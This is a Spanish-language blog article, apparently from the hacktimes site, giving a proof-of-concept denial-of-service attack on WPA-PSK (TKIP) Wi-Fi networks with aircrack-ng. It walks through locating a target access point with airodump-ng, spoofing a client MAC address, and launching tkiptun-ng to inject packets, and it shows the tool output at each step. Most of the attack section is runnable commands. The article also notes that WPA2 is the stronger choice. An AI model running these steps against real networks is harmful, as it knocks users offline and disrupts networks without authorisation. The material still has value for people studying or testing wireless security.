PoC DoS en redes Wifi WPA-PSK (TKIP)
Con el objetivo de desasociar un equipo con su correspondiente punto de acceso en redes con WPA es posible inyectar tráfico provocando una denegación de servicio (DoS) en el AP y así conseguir desasociar el resto de equipos conectados.
En este artículo se va a mostrar una prueba de concepto de cómo romper el protocolo TKIP en las redes Wi-Fi, WPA-PSK. Para ello, se va a utilizar la suite de herramientas de seguridad de redes Wi-Fi, aircrack-ng. A través de este ataque no es posible recuperar la contraseña pero si es posible generar una denegación de servicio en la red. Para su logro, es necesario que el punto de acceso tenga habilitado el servicio QoS, y que haya un cliente asociado a la red.
El protocolo TKIP (Temporal Key Integrity Protocol) se emplea en las redes Wi-Fi, WPA-PSK. Su objetivo es mejorar el sistema de cifrado de la clave de la red. En principio, fue diseñado para sustituir el sistema de cifrado WEP sin necesidad de actualizar el hardware. Únicamente era necesario actualizar el firmware. WPA2 mejora las características de seguridad de WPA. Por ello es recomendable emplear el sistema de cifrado WPA2 para proteger las redes Wi-Fi. Antes de comenzar, es necesario configurar la tarjeta de red Wi-Fi en modo “Monitor”. En primer lugar, hay que localizar el objetivo:
$ airodump-ng ath1
ath1 – interfaz de red Wi-Fi ath1
CH 7 ][ BAT: 1 hour 54 mins ][ Elapsed: 4 s ][ 2010-01-04 20:24
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:24:D2:15:01:BC 2 3 0 0 11 54e WPA TKIP PSK Vodafone01BB
00:60:B3:F4:14:31 26 13 0 0 7 54 . WPA TKIP PSK fastbreak
00:14:C1:38:F5:13 43 7 0 0 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes
Una vez que se ha detectado el objetivo hay que ponerle cerco. Para ello:
$ airodump-ng ath1 --bssid 00:14:C1:38:F5:13 --channel 11
ath1 – Interfaz de red Wi-Fi ath1
--bssid – dirección MAC del punto de acceso.
--channel – Canal en el que emite el punto de acceso.
CH 11 ][ BAT: 2 hours 12 mins ][ Elapsed: 1 min ][ 2010-01-04 20:01 ][ WPA handshake: 00:14:C1:38:F5:13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:C1:38:F5:13 46 100 883 10 0 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes
00:14:C1:38:F5:13 00:C0:A8:E6:68:97 26 1e-54e 0 11
Ahora es el momento de lanzar el ataque. En otro terminal:
$ tkiptun-ng ath1 -a 00:14:C1:38:F5:13 -e hacktimes -h 00:C0:A8:E6:68:97 -x 1024
ath1 – Interfaz de red Wi-Fi ath1
-a – dirección MAC del punto de acceso.
-e – ESSID de la red Wi-Fi.
-h – dirección MAC del cliente asociado.
-x 1024 – Inyectar 1024 paquetes por segundo.
The interface MAC (00:15:6D:54:0C:70) doesn't match the specified MAC (-h).
ifconfig ath1 hw ether 00:C0:A8:E6:68:97
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
20:02:06 Michael Test: Successful
20:02:06 Waiting for beacon frame (BSSID: 00:14:C1:38:F5:13) on channel 11
20:02:06 Found specified AP
20:02:06 WPA handshake: 00:14:C1:38:F5:13 capturedA8:E6:68:97] [ 0| 0 ACKs]
20:02:07 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0104-200233.cap
20:02:33 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0104-200233.cap
20:02:33 Got the answer!
20:02:33 Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.
Sent 1127089 packets, current guess: 8E...
Al volver al terminal anterior se observa la inyección de paquetes, lo que permitirá provocar la denegación de servicio:
CH 11 ][ BAT: 1 hour 35 mins ][ Elapsed: 21 mins ][ 2010-01-04 20:23 ][ WPA handshake: 00:14:C1:38:F5:13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:C1:38:F5:13 35 100 11929 81283 65 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes
00:14:C1:38:F5:13 00:C0:A8:E6:68:97 29 1e-54e 0 81303
En hacktimes hemos publicado varios artículos sobre redes wireless ya sea con WEP o WPA que se pueden consultar en la siguiente dirección: http://hacktimes.com/tag/wireless
Comentarios
Este comentario ha sido eliminado.
Añadir comentario